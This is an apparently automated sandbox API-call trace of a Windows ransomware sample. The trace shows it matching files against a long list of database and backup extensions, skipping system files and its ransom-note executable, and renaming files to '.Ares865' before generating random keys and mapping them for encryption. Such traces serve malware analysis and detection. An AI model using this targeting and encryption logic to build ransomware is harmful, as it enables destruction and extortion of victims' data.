[0084.738] lstrlenW (lpString="dbf") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.738] lstrlenW (lpString="mdf") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.738] lstrlenW (lpString="mdb") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.738] lstrlenW (lpString="sql") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.738] lstrlenW (lpString="sqlite") returned 6 [0084.738] lstrcmpiW (lpString1="15.bmp", lpString2="sqlite") returned -1 [0084.738] lstrlenW (lpString="sqlite3") returned 7 [0084.738] lstrcmpiW (lpString1="e15.bmp", lpString2="sqlite3") returned -1 [0084.738] lstrlenW (lpString="sqlitedb") returned 8 [0084.738] lstrcmpiW (lpString1="le15.bmp", lpString2="sqlitedb") returned -1 [0084.738] lstrlenW (lpString="xml") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.738] lstrlenW (lpString="$er") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.738] lstrlenW (lpString="4dd") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.738] lstrlenW (lpString="4dl") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.738] lstrlenW (lpString="^^^") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.739] lstrlenW (lpString="abs") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.739] lstrlenW (lpString="abx") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.739] lstrlenW (lpString="accdb") returned 5 [0084.739] lstrcmpiW (lpString1="5.bmp", lpString2="accdb") returned -1 [0084.739] lstrlenW (lpString="accdc") returned 5 [0084.739] lstrcmpiW (lpString1="5.bmp", lpString2="accdc") returned -1 [0084.739] lstrlenW (lpString="accde") returned 5 [0084.739] lstrcmpiW (lpString1="5.bmp", lpString2="accde") returned -1 [0084.739] lstrlenW (lpString="accdr") returned 5 [0084.739] lstrcmpiW (lpString1="5.bmp", lpString2="accdr") returned -1 [0084.739] lstrlenW (lpString="accdt") returned 5 [0084.739] lstrcmpiW (lpString1="5.bmp", lpString2="accdt") returned -1 [0084.739] lstrlenW (lpString="accdw") returned 5 [0084.739] lstrcmpiW (lpString1="5.bmp", lpString2="accdw") returned -1 [0084.739] lstrlenW (lpString="accft") returned 5 [0084.739] lstrcmpiW (lpString1="5.bmp", lpString2="accft") returned -1 [0084.739] lstrlenW (lpString="adb") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.739] lstrlenW (lpString="adb") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.739] lstrlenW (lpString="ade") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.739] lstrlenW (lpString="adf") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.739] lstrlenW (lpString="adn") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.739] lstrlenW (lpString="adp") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.739] lstrlenW (lpString="alf") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.739] lstrlenW (lpString="ask") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.739] lstrlenW (lpString="btr") returned 3 [0084.739] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.740] lstrlenW (lpString="cat") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.740] lstrlenW (lpString="cdb") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.740] lstrlenW (lpString="ckp") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.740] lstrlenW (lpString="cma") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.740] lstrlenW (lpString="cpd") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.740] lstrlenW (lpString="dacpac") returned 6 [0084.740] lstrcmpiW (lpString1="15.bmp", lpString2="dacpac") returned -1 [0084.740] lstrlenW (lpString="dad") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.740] lstrlenW (lpString="dadiagrams") returned 10 [0084.740] lstrcmpiW (lpString1="tile15.bmp", lpString2="dadiagrams") returned 1 [0084.740] lstrlenW (lpString="daschema") returned 8 [0084.740] lstrcmpiW (lpString1="le15.bmp", lpString2="daschema") returned 1 [0084.740] lstrlenW (lpString="db-journal") returned 10 [0084.740] lstrcmpiW (lpString1="tile15.bmp", lpString2="db-journal") returned 1 [0084.740] lstrlenW (lpString="db-shm") returned 6 [0084.740] lstrcmpiW (lpString1="15.bmp", lpString2="db-shm") returned -1 [0084.740] lstrlenW (lpString="db-wal") returned 6 [0084.740] lstrcmpiW (lpString1="15.bmp", lpString2="db-wal") returned -1 [0084.740] lstrlenW (lpString="dbc") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.740] lstrlenW (lpString="dbs") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.740] lstrlenW (lpString="dbt") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.740] lstrlenW (lpString="dbv") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.740] lstrlenW (lpString="dbx") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.740] lstrlenW (lpString="dcb") returned 3 [0084.740] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.740] lstrlenW (lpString="dct") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.741] lstrlenW (lpString="dcx") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.741] lstrlenW (lpString="ddl") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.741] lstrlenW (lpString="dlis") returned 4 [0084.741] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.741] lstrlenW (lpString="dp1") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.741] lstrlenW (lpString="dqy") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.741] lstrlenW (lpString="dsk") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.741] lstrlenW (lpString="dsn") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.741] lstrlenW (lpString="dtsx") returned 4 [0084.741] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.741] lstrlenW (lpString="dxl") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.741] lstrlenW (lpString="eco") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.741] lstrlenW (lpString="ecx") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.741] lstrlenW (lpString="edb") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.741] lstrlenW (lpString="epim") returned 4 [0084.741] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.741] lstrlenW (lpString="fcd") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.741] lstrlenW (lpString="fdb") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.741] lstrlenW (lpString="fic") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.741] lstrlenW (lpString="flexolibrary") returned 12 [0084.741] lstrcmpiW (lpString1="ertile15.bmp", lpString2="flexolibrary") returned -1 [0084.741] lstrlenW (lpString="fm5") returned 3 [0084.741] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.741] lstrlenW (lpString="fmp") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.742] lstrlenW (lpString="fmp12") returned 5 [0084.742] lstrcmpiW (lpString1="5.bmp", lpString2="fmp12") returned -1 [0084.742] lstrlenW (lpString="fmpsl") returned 5 [0084.742] lstrcmpiW (lpString1="5.bmp", lpString2="fmpsl") returned -1 [0084.742] lstrlenW (lpString="fol") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.742] lstrlenW (lpString="fp3") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.742] lstrlenW (lpString="fp4") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.742] lstrlenW (lpString="fp5") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.742] lstrlenW (lpString="fp7") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.742] lstrlenW (lpString="fpt") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.742] lstrlenW (lpString="frm") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.742] lstrlenW (lpString="gdb") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.742] lstrlenW (lpString="gdb") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.742] lstrlenW (lpString="grdb") returned 4 [0084.742] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.742] lstrlenW (lpString="gwi") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.742] lstrlenW (lpString="hdb") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.742] lstrlenW (lpString="his") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.742] lstrlenW (lpString="ib") returned 2 [0084.742] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.742] lstrlenW (lpString="idb") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.742] lstrlenW (lpString="ihx") returned 3 [0084.742] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.743] lstrlenW (lpString="itdb") returned 4 [0084.743] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.743] lstrlenW (lpString="itw") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.743] lstrlenW (lpString="jet") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.743] lstrlenW (lpString="jtx") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.743] lstrlenW (lpString="kdb") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.743] lstrlenW (lpString="kexi") returned 4 [0084.743] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.743] lstrlenW (lpString="kexic") returned 5 [0084.743] lstrcmpiW (lpString1="5.bmp", lpString2="kexic") returned -1 [0084.743] lstrlenW (lpString="kexis") returned 5 [0084.743] lstrcmpiW (lpString1="5.bmp", lpString2="kexis") returned -1 [0084.743] lstrlenW (lpString="lgc") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.743] lstrlenW (lpString="lwx") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.743] lstrlenW (lpString="maf") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.743] lstrlenW (lpString="maq") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.743] lstrlenW (lpString="mar") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.743] lstrlenW (lpString="marshal") returned 7 [0084.743] lstrcmpiW (lpString1="e15.bmp", lpString2="marshal") returned -1 [0084.743] lstrlenW (lpString="mas") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.743] lstrlenW (lpString="mav") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.743] lstrlenW (lpString="maw") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.743] lstrlenW (lpString="mdbhtml") returned 7 [0084.743] lstrcmpiW (lpString1="e15.bmp", lpString2="mdbhtml") returned -1 [0084.743] lstrlenW (lpString="mdn") returned 3 [0084.743] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.744] lstrlenW (lpString="mdt") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.744] lstrlenW (lpString="mfd") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.744] lstrlenW (lpString="mpd") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.744] lstrlenW (lpString="mrg") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.744] lstrlenW (lpString="mud") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.744] lstrlenW (lpString="mwb") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.744] lstrlenW (lpString="myd") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.744] lstrlenW (lpString="ndf") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.744] lstrlenW (lpString="nnt") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.744] lstrlenW (lpString="nrmlib") returned 6 [0084.744] lstrcmpiW (lpString1="15.bmp", lpString2="nrmlib") returned -1 [0084.744] lstrlenW (lpString="ns2") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.744] lstrlenW (lpString="ns3") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.744] lstrlenW (lpString="ns4") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.744] lstrlenW (lpString="nsf") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.744] lstrlenW (lpString="nv") returned 2 [0084.744] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.744] lstrlenW (lpString="nv2") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.744] lstrlenW (lpString="nwdb") returned 4 [0084.744] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.744] lstrlenW (lpString="nyf") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.744] lstrlenW (lpString="odb") returned 3 [0084.744] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.745] lstrlenW (lpString="odb") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.745] lstrlenW (lpString="oqy") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.745] lstrlenW (lpString="ora") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.745] lstrlenW (lpString="orx") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.745] lstrlenW (lpString="owc") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.745] lstrlenW (lpString="p96") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.745] lstrlenW (lpString="p97") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.745] lstrlenW (lpString="pan") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.745] lstrlenW (lpString="pdb") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.745] lstrlenW (lpString="pdm") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.745] lstrlenW (lpString="pnz") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.745] lstrlenW (lpString="qry") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.745] lstrlenW (lpString="qvd") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.745] lstrlenW (lpString="rbf") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.745] lstrlenW (lpString="rctd") returned 4 [0084.745] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.745] lstrlenW (lpString="rod") returned 3 [0084.745] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.745] lstrlenW (lpString="rodx") returned 4 [0084.746] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.746] lstrlenW (lpString="rpd") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.746] lstrlenW (lpString="rsd") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.746] lstrlenW (lpString="sas7bdat") returned 8 [0084.746] lstrcmpiW (lpString1="le15.bmp", lpString2="sas7bdat") returned -1 [0084.746] lstrlenW (lpString="sbf") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.746] lstrlenW (lpString="scx") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.746] lstrlenW (lpString="sdb") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.746] lstrlenW (lpString="sdc") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.746] lstrlenW (lpString="sdf") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.746] lstrlenW (lpString="sis") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.746] lstrlenW (lpString="spq") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.746] lstrlenW (lpString="te") returned 2 [0084.746] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.746] lstrlenW (lpString="teacher") returned 7 [0084.746] lstrcmpiW (lpString1="e15.bmp", lpString2="teacher") returned -1 [0084.746] lstrlenW (lpString="tmd") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.746] lstrlenW (lpString="tps") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.746] lstrlenW (lpString="trc") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.746] lstrlenW (lpString="trc") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.746] lstrlenW (lpString="trm") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.746] lstrlenW (lpString="udb") returned 3 [0084.746] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.747] lstrlenW (lpString="udl") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.747] lstrlenW (lpString="usr") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.747] lstrlenW (lpString="v12") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.747] lstrlenW (lpString="vis") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.747] lstrlenW (lpString="vpd") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.747] lstrlenW (lpString="vvv") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.747] lstrlenW (lpString="wdb") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.747] lstrlenW (lpString="wmdb") returned 4 [0084.747] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.747] lstrlenW (lpString="wrk") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.747] lstrlenW (lpString="xdb") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.747] lstrlenW (lpString="xld") returned 3 [0084.747] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.747] lstrlenW (lpString="xmlff") returned 5 [0084.747] lstrcmpiW (lpString1="5.bmp", lpString2="xmlff") returned -1 [0084.747] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.Ares865") returned 90 [0084.747] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp.ares865"), dwFlags=0x1) returned 1 [0084.748] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.748] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.748] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.749] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.750] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.750] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.750] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.751] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.754] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.755] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.755] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.755] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.756] CloseHandle (hObject=0x15c) returned 1 [0084.756] CloseHandle (hObject=0x118) returned 1 [0084.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.756] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae30db45, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae30db45, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdca9c9ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0084.756] lstrcmpiW (lpString1="usertile16.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.756] lstrcmpiW (lpString1="usertile16.bmp", lpString2="aoldtz.exe") returned 1 [0084.756] lstrcmpiW (lpString1="usertile16.bmp", lpString2=".") returned 1 [0084.756] lstrcmpiW (lpString1="usertile16.bmp", lpString2="..") returned 1 [0084.756] lstrcmpiW (lpString1="usertile16.bmp", lpString2="windows") returned -1 [0084.756] lstrcmpiW (lpString1="usertile16.bmp", lpString2="bootmgr") returned 1 [0084.756] lstrcmpiW (lpString1="usertile16.bmp", lpString2="temp") returned 1 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2="pagefile.sys") returned 1 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2="boot") returned 1 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2="ids.txt") returned 1 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2="ntuser.dat") returned 1 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2="perflogs") returned 1 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2="MSBuild") returned 1 [0084.757] lstrlenW (lpString="usertile16.bmp") returned 14 [0084.757] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 82 [0084.757] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile16.bmp" | out: lpString1="usertile16.bmp") returned="usertile16.bmp" [0084.757] lstrlenW (lpString="usertile16.bmp") returned 14 [0084.757] lstrlenW (lpString="Ares865") returned 7 [0084.757] lstrcmpiW (lpString1="e16.bmp", lpString2="Ares865") returned 1 [0084.757] lstrlenW (lpString=".dll") returned 4 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2=".dll") returned 1 [0084.757] lstrlenW (lpString=".lnk") returned 4 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2=".lnk") returned 1 [0084.757] lstrlenW (lpString=".ini") returned 4 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2=".ini") returned 1 [0084.757] lstrlenW (lpString=".sys") returned 4 [0084.757] lstrcmpiW (lpString1="usertile16.bmp", lpString2=".sys") returned 1 [0084.757] lstrlenW (lpString="usertile16.bmp") returned 14 [0084.757] lstrlenW (lpString="bak") returned 3 [0084.757] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.757] lstrlenW (lpString="ba_") returned 3 [0084.757] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.757] lstrlenW (lpString="dbb") returned 3 [0084.757] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.757] lstrlenW 